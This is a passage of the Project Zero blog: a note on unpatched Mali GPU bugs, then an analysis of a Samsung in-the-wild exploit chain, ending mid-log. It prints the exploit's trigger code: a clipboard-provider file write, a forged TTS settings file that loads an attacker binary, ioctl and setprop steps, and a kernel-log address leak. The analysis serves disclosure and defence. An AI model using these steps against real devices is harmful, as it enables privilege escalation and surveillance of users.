Project Zero

News and updates from the Project Zero team at Google

Mind the Gap

22 November, 2022 - 22:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title                    Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE                   CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue      6th January 2022

Impact                A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace, and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are advised to patch as quickly as they can once a release containing security updates is available, the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocked on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

Category: Hacking & Security

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November, 2022 - 16:50

Maddie Stone, Project Zero


Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.


As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendors transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.


While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes. 


We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products. 

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a three-vulnerability chain where all three vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.


The sample used three vulnerabilities, all patched in March 2021 by Samsung: 

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337

  2. Kernel information leak via sec_log - CVE-2021-25369

  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370


The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example, the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC, while phones sold in most other places (e.g. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver, which are specific to the Exynos Samsung phones.


Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.


The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June. 

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit runs in the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.



About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.


According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.


This custom clipboard provider is specifically for images. The com.android.server.semclipboard.SemClipboardProvider class defines the following variables:

DATABASE_NAME = "clipboardimage.db"

TABLE_NAME = "ClipboardImageTable"

URL = "content://com.sec.android.semclipboardprovider/images"

CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";


Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.  


UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead, its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>


Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor. 


    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }


The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control in this function, so any app, including one running in the untrusted_app SELinux context, can set the _data column directly. By calling insert and then opening the resulting row, an app can open files via the system server that it wouldn’t usually be able to open on its own.


The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.


ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

Uri semclipboard_uri = Uri.parse("content://com.sec.android.semclipboardprovider");

ContentResolver resolver = getContentResolver();

Uri newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd();


Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.

  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.

  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.

  4. Get the ContentResolver object that allows apps access to ContentProviders.

  5. Call insert on the semclipboardprovider with our key-value pair.

  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.


The exploit wrote its next-stage binary to the directory /data/system/users/0/. The dropped file has an SELinux context of users_system_data_file. Normal untrusted_app processes don’t have access to open or create users_system_data_file files, so in this case they proxy the open through system_server, which can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passes the fd to the calling process, the calling process can read and write to it.
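
The reason a proxied open is enough can be illustrated outside Android. Classic Unix permission checks are made when a file is opened, and the resulting descriptor stays usable by whichever process holds it; SELinux additionally treats open as a separate permission from read and write, which is the gap described above. The following is a minimal sketch in C, not taken from the exploit, that hands an already-open descriptor from one endpoint to another over a Unix-domain socket using SCM_RIGHTS. On Android the descriptor travels over Binder inside a ParcelFileDescriptor instead; the helper names send_fd and recv_fd are illustrative assumptions.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send one open file descriptor over a connected Unix-domain socket.
 * Returns 0 on success, -1 on failure. (Hypothetical helper.) */
int send_fd(int sock, int fd_to_send)
{
    char byte = 'F'; /* one byte of ordinary data accompanies the fd */
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align; /* forces correct alignment of buf */
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    /* The descriptor itself rides in an SCM_RIGHTS control message. */
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one file descriptor sent with send_fd().
 * Returns the new descriptor, or -1 on failure. (Hypothetical helper.) */
int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd = -1;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    if (recvmsg(sock, &msg, 0) <= 0)
        return -1;

    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS)
        return -1;

    /* The kernel has installed a fresh descriptor for the same open file. */
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

The receiver never calls open() on a path; it only reads and writes through the descriptor it was given, which mirrors how the exploit uses the fd returned by the clipboard provider.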


The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.


This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks whether the UID of the calling process is 1000, meaning that the caller is already running with system privileges.


  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).


The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.


Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API. 


The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.


To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.


<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name="eng-USA-Variant Info">f00</string>

          <string name="SMT_STUBCHECK_STATUS">STUB_SUCCESS</string>

          <string name="SMT_LATEST_INSTALLED_ENGINE_PATH">/data/system/users/0/newFile.bin</string>

      </map>


The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context. 


The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.


Phones released on Android P and earlier seemed to ship a version of the app older than 3.0.08.18, which still loaded the executable, up through December 2020. For example, the SamsungTTS app from an A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.


Once the ELF file is loaded via the System.load API, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second-stage ELF is running as system, the exploit continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak that discloses the addresses of the task_struct and the sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.
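
The arithmetic behind both uses of the leak is simple and can be sketched as follows. This is a minimal illustration in C, assuming that KASLR shifts the whole kernel image by one constant slide and that addr_limit sits at a fixed, build-specific offset from the start of task_struct. The function names, and any concrete addresses or offsets a caller passes in, are hypothetical and are not values from the exploit.

```c
#include <stdint.h>

/* With a single constant slide, one leaked symbol address is enough:
 * slide = runtime address - address of the same symbol in the unslid image. */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t static_addr)
{
    return leaked_addr - static_addr;
}

/* Any other symbol can then be located by adding the same slide. */
uint64_t rebase_symbol(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}

/* addr_limit is reached by adding its offset within task_struct to the
 * leaked task_struct address. The offset depends on the kernel build and
 * is passed in by the caller (an assumption of this sketch). */
uint64_t addr_limit_ptr(uint64_t task_struct_addr, uint64_t addr_limit_offset)
{
    return task_struct_addr + addr_limit_offset;
}
```

In this sketch the leaked sys_call_table address would be passed as leaked_addr together with the table's address from the matching firmware image, and the resulting slide would be applied to any other kernel symbol the later stages need.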


The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.



The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break KASLR. WARN_ON is intended to be used only in situations where a kernel bug is detected, because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.


void __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();


        pr_warn("------------[ cut here ]------------\n");


        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);


        if (args)

                vprintk(args->fmt, args->args);


        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }


        print_modules();


        dump_stack();


        print_oops_end_marker();


        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}



On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 


a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg


$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };


Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log. 


The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  



/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;


        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;


        cli = filp->private_data;

        if (!cli)

                return -EINVAL;


        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

        

        [...]


        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }


        return rcode;

}


Specifically, the WARN_ON is in the function kbasep_vinstr_hwcnt_reader_ioctl. To trigger it, the exploit only needs to issue an invalid ioctl number to the HWCNT driver. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl, which initializes the hwcnt driver and returns a file descriptor that accepts hwcnt ioctls; the second targets that hwcnt descriptor with an invalid ioctl number, 0xFE.


  hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

  ioctl(hwcnt_fd, 0x4004BEFE, 0);
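
To see why the second request reaches the default branch, it helps to split the two request numbers into their fields. The sketch below is a minimal decoder in C that assumes the generic Linux ioctl encoding used on arm64 (number in bits 0-7, type in bits 8-15, size in bits 16-29, direction in bits 30-31). The struct and function names are illustrative.

```c
#include <stdint.h>

/* Fields packed into a Linux ioctl request number (generic encoding). */
struct ioctl_fields {
    unsigned dir;  /* 0 = none, 1 = write (user to kernel), 2 = read, 3 = both */
    unsigned size; /* size in bytes of the argument structure */
    unsigned type; /* driver "magic" byte */
    unsigned nr;   /* command number within that driver */
};

/* Split a 32-bit request number into its four fields. */
struct ioctl_fields decode_ioctl(uint32_t request)
{
    struct ioctl_fields f;

    f.nr   = request & 0xFFu;           /* bits 0-7   */
    f.type = (request >> 8) & 0xFFu;    /* bits 8-15  */
    f.size = (request >> 16) & 0x3FFFu; /* bits 16-29 */
    f.dir  = (request >> 30) & 0x3u;    /* bits 30-31 */
    return f;
}
```

Decoding 0x4004BEFE gives type 0xBE, number 0xFE and a 4-byte write argument. The type byte has to equal KBASE_HWCNT_READER for the call to get past the first check in the handler shown above, while 0xFE is the invalid command number the text refers to, so the switch falls through to the WARN_ON. Decoding 0x40148008 gives type 0x80, number 0x08 and a 20-byte argument.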


To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:


setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;


In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport. 


allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;


The bugreport service is defined in /system/etc/init/dumpstate.rc:


service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot


The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.


The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. These are the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log function (symbols are included within the binary) copies everything from the path provided in argument two to the path provided in argument three.


  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");


After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed, so the watch fires when dumpstate has finished writing to sec_log.log.
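
A watch of this kind can be sketched in a few lines of C with the standard Linux inotify API. This is a minimal illustration rather than the exploit's own code; the helper names watch_close_write and wait_for_file are assumptions, and the directory and file name are supplied by the caller.

```c
#include <string.h>
#include <sys/inotify.h>
#include <unistd.h>

/* Start watching a directory for files that were open for writing and
 * have just been closed. Returns an inotify descriptor, or -1 on error. */
int watch_close_write(const char *dir)
{
    int ifd = inotify_init1(IN_CLOEXEC);

    if (ifd < 0)
        return -1;
    if (inotify_add_watch(ifd, dir, IN_CLOSE_WRITE) < 0) {
        close(ifd);
        return -1;
    }
    return ifd;
}

/* Block until an IN_CLOSE_WRITE event arrives for the file called `wanted`
 * inside the watched directory. Returns 0 once seen, -1 on a read error. */
int wait_for_file(int ifd, const char *wanted)
{
    /* Buffer aligned for struct inotify_event, as the inotify(7) example does. */
    char buf[4096] __attribute__((aligned(__alignof__(struct inotify_event))));

    for (;;) {
        ssize_t len = read(ifd, buf, sizeof(buf));

        if (len <= 0)
            return -1;

        /* One read() may return several variable-length events. */
        for (char *p = buf; p < buf + len; ) {
            const struct inotify_event *ev = (const struct inotify_event *)p;

            if ((ev->mask & IN_CLOSE_WRITE) && ev->len > 0 &&
                strcmp(ev->name, wanted) == 0)
                return 0;
            p += sizeof(struct inotify_event) + ev->len;
        }
    }
}
```

With these helpers, a caller would set up the watch on the log directory before starting the bugreport service and then wait for sec_log.log, so that the close event cannot be missed between the two steps.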


An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values in the exception stack dump, on the lines whose addresses end in b60 and bc0: the task_struct and the sys_call_table address.
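
As a rough sketch of that scan, the function below pulls the first 64-bit word from a stack-dump line whose address label ends in a given suffix. The function name stack_word_at and the parsing strategy are assumptions made for illustration; the exploit's actual parser is not shown in the sample.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* If `line` is a stack-dump line such as
 *   "<4>[...]  [4:    poc:25943] bb60: ffffffc061b65800 ..."
 * whose address label ends in `suffix` (e.g. "b60"), store the first
 * word after the label in *out and return 1. Otherwise return 0.
 * (Hypothetical helper, not taken from the exploit.) */
int stack_word_at(const char *line, const char *suffix, uint64_t *out)
{
    /* The label follows the last ']' of the log prefix. */
    const char *p = strrchr(line, ']');
    if (!p)
        return 0;
    p++;
    while (*p == ' ')
        p++;

    const char *colon = strchr(p, ':');
    if (!colon)
        return 0;

    size_t tok_len = (size_t)(colon - p);
    size_t suf_len = strlen(suffix);
    if (tok_len < suf_len || tok_len > 16)
        return 0;
    /* The label must consist only of lowercase hex digits. */
    if (strspn(p, "0123456789abcdef") != tok_len)
        return 0;
    if (memcmp(colon - suf_len, suffix, suf_len) != 0)
        return 0;

    char *end;
    unsigned long long v = strtoull(colon + 1, &end, 16);
    if (end == colon + 1)
        return 0;
    *out = (uint64_t)v;
    return 1;
}
```

Run over each line of the log below, the suffix "b60" would select the line starting with bb60 and "bc0" the line starting with bbc0.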


<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

